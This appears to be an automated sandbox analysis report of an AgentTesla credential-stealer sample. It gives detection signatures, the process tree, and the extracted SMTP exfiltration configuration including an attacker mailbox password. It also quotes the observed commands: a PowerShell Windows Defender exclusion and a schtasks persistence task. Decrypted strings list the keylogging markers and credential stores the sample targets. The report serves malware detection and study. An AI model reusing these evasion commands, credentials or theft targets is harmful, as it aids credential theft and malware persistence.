Windows Analysis Report
LisectAVT_2403002A_16.exe

Overview

General Information

Sample name:LisectAVT_2403002A_16.exe
Analysis ID:1482478
MD5:2c10cb6c2e23b7712ebf4042d669cd09
SHA1:f86adb59bd065afd9195b9375271096f341842dc
SHA256:546569a42f00553d7fda79e6961779afadd95ea8e6a8738ef344275f2b642244
Tags:AgentTeslaexe

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Sigma detected: Scheduled temp file as task from temp location
Yara detected AgentTesla
Yara detected AntiVM3
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses SMTP (mail sending)
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • LisectAVT_2403002A_16.exe (PID: 6668 cmdline: "C:\Users\user\Desktop\LisectAVT_2403002A_16.exe" MD5: 2C10CB6C2E23B7712EBF4042D669CD09)
    • powershell.exe (PID: 7244 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\LisectAVT_2403002A_16.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7260 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7768 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • powershell.exe (PID: 7272 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7280 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 7316 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NxmtwwVGOtEdjd" /XML "C:\Users\user\AppData\Local\Temp\tmpB5CB.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • LisectAVT_2403002A_16.exe (PID: 7532 cmdline: "C:\Users\user\Desktop\LisectAVT_2403002A_16.exe" MD5: 2C10CB6C2E23B7712EBF4042D669CD09)
    • LisectAVT_2403002A_16.exe (PID: 7544 cmdline: "C:\Users\user\Desktop\LisectAVT_2403002A_16.exe" MD5: 2C10CB6C2E23B7712EBF4042D669CD09)
  • NxmtwwVGOtEdjd.exe (PID: 7680 cmdline: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe MD5: 2C10CB6C2E23B7712EBF4042D669CD09)
    • schtasks.exe (PID: 7912 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NxmtwwVGOtEdjd" /XML "C:\Users\user\AppData\Local\Temp\tmpCD2C.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7920 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • NxmtwwVGOtEdjd.exe (PID: 7964 cmdline: "C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe" MD5: 2C10CB6C2E23B7712EBF4042D669CD09)
    • NxmtwwVGOtEdjd.exe (PID: 7972 cmdline: "C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe" MD5: 2C10CB6C2E23B7712EBF4042D669CD09)
  • cleanup
Name:Agent Tesla, AgentTesla
Description:A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
Attribution:SWEED
Link:https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
{"Exfil Mode": "SMTP", "Host": "mail.mbarieservicesltd.com", "Username": "saless@mbarieservicesltd.com", "Password": "     *o9H+18Q4%;M     "}
Source | Rule | Description | Author
dump.pcap | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security

Source | Rule | Description | Author
0000000F.00000002.2902484873.0000000002D3A000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000009.00000002.2898350883.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security
00000009.00000002.2901886951.0000000002ECA000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
0000000A.00000002.1787617220.0000000004500000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security
00000000.00000002.1723431532.00000000041AF000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security
Source | Rule | Description | Author
10.2.NxmtwwVGOtEdjd.exe.45296a0.4.unpack | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security
10.2.NxmtwwVGOtEdjd.exe.4500680.3.unpack | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security
0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security
0.2.LisectAVT_2403002A_16.exe.41d8730.5.unpack | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security
10.2.NxmtwwVGOtEdjd.exe.45296a0.4.raw.unpack | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\LisectAVT_2403002A_16.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\LisectAVT_2403002A_16.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\LisectAVT_2403002A_16.exe", ParentImage: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe, ParentProcessId: 6668, ParentProcessName: LisectAVT_2403002A_16.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\LisectAVT_2403002A_16.exe", ProcessId: 7244, ProcessName: powershell.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\LisectAVT_2403002A_16.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\LisectAVT_2403002A_16.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\LisectAVT_2403002A_16.exe", ParentImage: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe, ParentProcessId: 6668, ParentProcessName: LisectAVT_2403002A_16.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\LisectAVT_2403002A_16.exe", ProcessId: 7244, ProcessName: powershell.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NxmtwwVGOtEdjd" /XML "C:\Users\user\AppData\Local\Temp\tmpCD2C.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NxmtwwVGOtEdjd" /XML "C:\Users\user\AppData\Local\Temp\tmpCD2C.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe, ParentImage: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe, ParentProcessId: 7680, ParentProcessName: NxmtwwVGOtEdjd.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NxmtwwVGOtEdjd" /XML "C:\Users\user\AppData\Local\Temp\tmpCD2C.tmp", ProcessId: 7912, ProcessName: schtasks.exe
Source: Network Connection | Author: frack113 | Data: DestinationIp: 199.79.62.115, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe, Initiated: true, ProcessId: 7544, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49735
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NxmtwwVGOtEdjd" /XML "C:\Users\user\AppData\Local\Temp\tmpB5CB.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NxmtwwVGOtEdjd" /XML "C:\Users\user\AppData\Local\Temp\tmpB5CB.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\LisectAVT_2403002A_16.exe", ParentImage: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe, ParentProcessId: 6668, ParentProcessName: LisectAVT_2403002A_16.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NxmtwwVGOtEdjd" /XML "C:\Users\user\AppData\Local\Temp\tmpB5CB.tmp", ProcessId: 7316, ProcessName: schtasks.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\LisectAVT_2403002A_16.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\LisectAVT_2403002A_16.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\LisectAVT_2403002A_16.exe", ParentImage: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe, ParentProcessId: 6668, ParentProcessName: LisectAVT_2403002A_16.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\LisectAVT_2403002A_16.exe", ProcessId: 7244, ProcessName: powershell.exe

Persistence and Installation Behavior

Source: Process started | Author: Joe Security | Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NxmtwwVGOtEdjd" /XML "C:\Users\user\AppData\Local\Temp\tmpB5CB.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NxmtwwVGOtEdjd" /XML "C:\Users\user\AppData\Local\Temp\tmpB5CB.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\LisectAVT_2403002A_16.exe", ParentImage: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe, ParentProcessId: 6668, ParentProcessName: LisectAVT_2403002A_16.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NxmtwwVGOtEdjd" /XML "C:\Users\user\AppData\Local\Temp\tmpB5CB.tmp", ProcessId: 7316, ProcessName: schtasks.exe
No Snort rule has matched

Timestamp | SID | Source Port | Destination Port | Protocol | Classtype
2024-07-25T23:35:36.103588+0200 | 2022930 | 443 | 49737 | TCP | A Network Trojan was detected
2024-07-25T23:35:25.918768+0200 | 2855542 | 49735 | 587 | TCP | A Network Trojan was detected
2024-07-25T23:35:29.982176+0200 | 2855542 | 49736 | 587 | TCP | A Network Trojan was detected
2024-07-25T23:35:55.569991+0200 | 2022930 | 443 | 53201 | TCP | A Network Trojan was detected
2024-07-25T23:35:56.837685+0200 | 2022930 | 443 | 53202 | TCP | A Network Trojan was detected
2024-07-25T23:35:11.625146+0200 | 2840032 | 49736 | 587 | TCP | A Network Trojan was detected


AV Detection

Source: LisectAVT_2403002A_16.exe | Avira: detected
Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe | Avira: detection malicious, Label: TR/Kryptik.mzsma
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Host": "mail.mbarieservicesltd.com", "Username": "saless@mbarieservicesltd.com", "Password": " *o9H+18Q4%;M "}
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe | Joe Sandbox ML: detected
Source: LisectAVT_2403002A_16.exe | Joe Sandbox ML: detected
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: /log.tmp
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: <br>[
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: yyyy-MM-dd HH:mm:ss
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: ]<br>
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: <br>
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: Time:
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: MM/dd/yyyy HH:mm:ss
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: <br>User Name:
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: <br>Computer Name:
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: <br>OSFullName:
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: <br>CPU:
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: <br>RAM:
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: <br>
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: IP Address:
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: <br>
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: <hr>
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: New
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: MM/dd/yyyy HH:mm:ss
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: IP Address:
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: false
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: false
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: false
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: false
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: false
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: false
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: false
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: false
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: false
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: mail.mbarieservicesltd.com
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: saless@mbarieservicesltd.com
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: *o9H+18Q4%;M
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: iinfo@mbarieservicesltd.com
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: false
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: false
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: appdata
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: KTvkzEc
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: KTvkzEc.exe
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: KTvkzEc
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: Type
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: <br>
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: <hr>
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: <br>
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: <b>[
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: ]</b> (
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: )<br>
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: {BACK}
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: {ALT+TAB}
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: {ALT+F4}
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: {TAB}
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: {ESC}
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: {Win}
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: {CAPSLOCK}
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: {KEYUP}
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: {KEYDOWN}
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: {KEYLEFT}
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: {KEYRIGHT}
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: {DEL}
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: {END}
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: {HOME}
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: {Insert}
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: {NumLock}
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: {PageDown}
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: {PageUp}
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: {ENTER}
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: {F1}
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: {F2}
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: {F3}
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: {F4}
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: {F5}
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: {F6}
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: {F7}
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: {F8}
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: {F9}
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: {F10}
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: {F11}
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: {F12}
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: control
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: {CTRL}
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: &amp;
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: &lt;
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: &gt;
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: &quot;
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: <br><hr>Copied Text: <br>
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: <hr>
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: logins
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: IE/Edge
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: Windows Secure Note
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: 3CCD5499-87A8-4B10-A215-608888DD3B55
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: Windows Web Password Credential
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: 154E23D0-C644-4E6F-8CE6-5069272F999F
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: Windows Credential Picker Protector
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: Web Credentials
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: Windows Credentials
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: Windows Domain Certificate Credential
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: 3E0E35BE-1B77-43E7-B873-AED901B6275B
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: Windows Domain Password Credential
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: Windows Extended Credential
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: 00000000-0000-0000-0000-000000000000
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: SchemaId
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: pResourceElement
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: pIdentityElement
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: pPackageSid
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: pAuthenticatorElement
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: IE/Edge
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: UC Browser
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: UCBrowser\
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: Login Data
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: journal
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: wow_logins
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: Safari for Windows
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: \Common Files\Apple\Apple Application Support\plutil.exe
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: \Apple Computer\Preferences\keychain.plist
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: <array>
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: <dict>
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: <string>
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: </string>
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: <string>
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: </string>
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: <data>
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: </data>
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: -convert xml1 -s -o "
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: \fixed_keychain.xml"
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: \Microsoft\Credentials\
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: \Microsoft\Credentials\
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: \Microsoft\Credentials\
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: \Microsoft\Credentials\
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: \Microsoft\Protect\
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: credential
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: QQ Browser
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: Tencent\QQBrowser\User Data
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: \Default\EncryptedStorage
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: Profile
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: \EncryptedStorage
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: entries
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: category
